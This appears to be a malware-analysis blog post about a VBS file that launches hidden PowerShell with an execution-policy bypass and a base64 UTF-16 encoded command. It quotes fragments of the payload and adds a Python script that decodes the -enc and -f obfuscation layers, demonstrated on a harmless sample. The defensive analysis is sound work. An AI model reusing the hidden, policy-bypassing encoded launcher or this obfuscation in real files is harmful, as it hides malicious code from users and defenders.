2018-03-05
Obfuscating powershell with -encoded and UTF-16
In some files I noticed a vbs file where I expected something else. Vbs sounds like Visual Basic Script, so I directly started looking for malware. And indeed I saw suspicious code, with a type of obfuscation that was new to me. The vbs has one really long line, beginning with:

    CreateObject("Wscript.Shell").Run("powershell -w hidden -ep bypass -enc aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADQAOAB9AHsAMQAyAH0AewAyADgAfQB7ADEAMAAzAH0AewAyADEAfQB7ADkAfQB7ADEAMAA2AH0AewA3ADAAfQB7ADIAOAB9AHsAOAB9AHsAMAB9AHsA

and at the end:

    IgByACIALAAiAGsAIgAsACIAYQAiACwAIgAgACIALAAiAHYAIgAsACIAZwAiACwAIgBzACIALAAiAGUAIgAsACIAbgAiACwAIgArACIALAAiAHQAIgAsACIAcgAiACwAIgAiACwAIgB0ACIALAAiAHAAIgAsACIAZQAiACwAIgBlACIALAAiAC8AIgAsACIAZQAiACwAIgBTACIAKQA=")

Which looked very base64-like to me. But standard tools could not find out what it was:

    $ base64 -d < base64part | file -
    /dev/stdin: data

But with a second look I could make out something:

    $ base64 -d < base64part | xxd | less
    0000000: 6900 6e00 7600 6f00 6b00 6500 2d00 6500 i.n.v.o.k.e.-.e.
    0000010: 7800 7000 7200 6500 7300 7300 6900 6f00 x.p.r.e.s.s.i.o.
    0000020: 6e00 2800 2200 7b00 3400 3800 7d00 7b00 n.(.".{.4.8.}.{.
    0000030: 3100 3200 7d00 7b00 3200 3800 7d00 7b00 1.2.}.{.2.8.}.{.
    0000040: 3100 3000 3300 7d00 7b00 3200 3100 7d00 1.0.3.}.{.2.1.}.
    0000050: 7b00 3900 7d00 7b00 3100 3000 3600 7d00 {.9.}.{.1.0.6.}.
    0000060: 7b00 3700 3000 7d00 7b00 3200 3800 7d00 {.7.0.}.{.2.8.}.
    0000070: 7b00 3800 7d00 7b00 3000 7d00 7b00 3200 {.8.}.{.0.}.{.2.
    0000080: 7d00 7b00 3400 3100 7d00 7b00 3100 3100 }.{.4.1.}.{.1.1.
    0000090: 3300 7d00 7b00 3600 3600 7d00 7b00 3000 3.}.{.6.6.}.{.0.

Suddenly there is UTF-16 powershell code. Or when I simply cat it to a terminal:

    invoke-expression("{48}{12}{28}{103}{21}{9}{106}{70}{28}{8}{0}{2}{41}{113}{66} [..] -f "t","2"," ",".","i","f","C","'","c","o","2",")","n","n","0","c","'","/",

It looks like some kind of array mapping, but I have no idea how to decode this into readable code to check what it does.
I am quite sure it can't be up to any good if I keep finding levels of obfuscation!
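The two layers seen above can be peeled statically, without ever handing the string to invoke-expression. The following Python is an added example and not code from the post: it undoes the -enc argument (base64 of UTF-16LE text, which is why the xxd dump shows a 00 byte after every letter and why file only says "data"), and then resolves the "{n}{m}..." -f "a","b",... expression, which PowerShell's format operator evaluates by substituting argument n for every {n}, with indexes allowed to repeat and arguments allowed to be empty. The base64 prefix is the one quoted in the post; since the full payload is not on the page, the -f stage is demonstrated on a constructed harmless sample (Get-Date) in the same shape. The function names, the regexes and the sample are assumptions of this example.

```python
import base64
import re

# The beginning of the -enc argument quoted in the post (line-wrap spaces removed).
# Only this prefix is on the page, so only the opening of the script can be
# recovered from it; the rest of the payload is not reproduced here.
PAGE_PREFIX = (
    "aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADQAOAB9AHsAMQAyAH0A"
    "ewAyADgAfQB7ADEAMAAzAH0AewAyADEAfQB7ADkAfQB7ADEAMAA2AH0AewA3ADAAfQB7ADIA"
    "OAB9AHsAOAB9AHsAMAB9AHsA"
)


def decode_encoded_command(enc: str) -> str:
    """Undo 'powershell -enc': base64 to bytes, then UTF-16LE to text.

    The UTF-16LE step is why xxd shows every character followed by 00 and why
    'base64 -d | file' only reports 'data'."""
    return base64.b64decode(enc).decode("utf-16-le")


def encode_command(cmd: str) -> str:
    """The inverse, i.e. the form 'powershell -enc' expects (used here to build the sample)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# One double-quoted PowerShell string literal; a doubled quote inside it is an escaped quote.
_ARG_RE = re.compile(r'"((?:[^"]|"")*)"')
# The invoke-expression( ... ) wrapper, case-insensitive like PowerShell itself.
_IEX_RE = re.compile(r"^\s*invoke-expression\s*\((.*)\)\s*$", re.IGNORECASE | re.DOTALL)


def resolve_format_operator(expr: str) -> str:
    """Resolve '"{i}{j}..." -f "a","b",...' into the string PowerShell would build.

    Every {n} is replaced by argument n; indexes may repeat (the post's {28} appears
    twice) and arguments may be empty strings (the post's ,"", fragment).
    Assumes the format string is a plain double-quoted literal made of {n} tokens."""
    fmt_part, sep, arg_part = expr.partition("-f")
    if not sep:
        raise ValueError("no -f operator found")
    fmt = fmt_part.strip()
    if not (fmt.startswith('"') and fmt.endswith('"')):
        raise ValueError("format string is not a double-quoted literal")
    args = [m.group(1).replace('""', '"') for m in _ARG_RE.finditer(arg_part)]
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt[1:-1])


def deobfuscate(enc: str) -> str:
    """Peel both layers seen in the post: -enc base64/UTF-16LE, then the -f mapping."""
    decoded = decode_encoded_command(enc)
    m = _IEX_RE.match(decoded)
    inner = m.group(1) if m else decoded
    return resolve_format_operator(inner)


# Constructed harmless sample in the same shape as the post's payload (not the real
# script): 'Get-Date' scattered over an argument list, with {0} and {2} reused and
# argument 6 an empty string.
SAMPLE_EXPR = 'invoke-expression("{1}{6}{2}{0}{3}{4}{5}{0}{2}" -f "t","G","e","-","D","a","")'
SAMPLE_ENC = encode_command(SAMPLE_EXPR)


if __name__ == "__main__":
    print("page prefix decodes to  :", decode_encoded_command(PAGE_PREFIX))
    print("sample -enc argument    :", SAMPLE_ENC)
    print("sample after both layers:", deobfuscate(SAMPLE_ENC))
```

The point of the -f stage is that it is only a string rewrite: the readable command exists as soon as the substitution is done, so an analyst can recover it on paper or with a script like this and never needs to run the result. Real samples often stack further layers (the recovered text may itself be another encoded or formatted string), so the output of deobfuscate should be inspected and, if needed, fed back through the same functions.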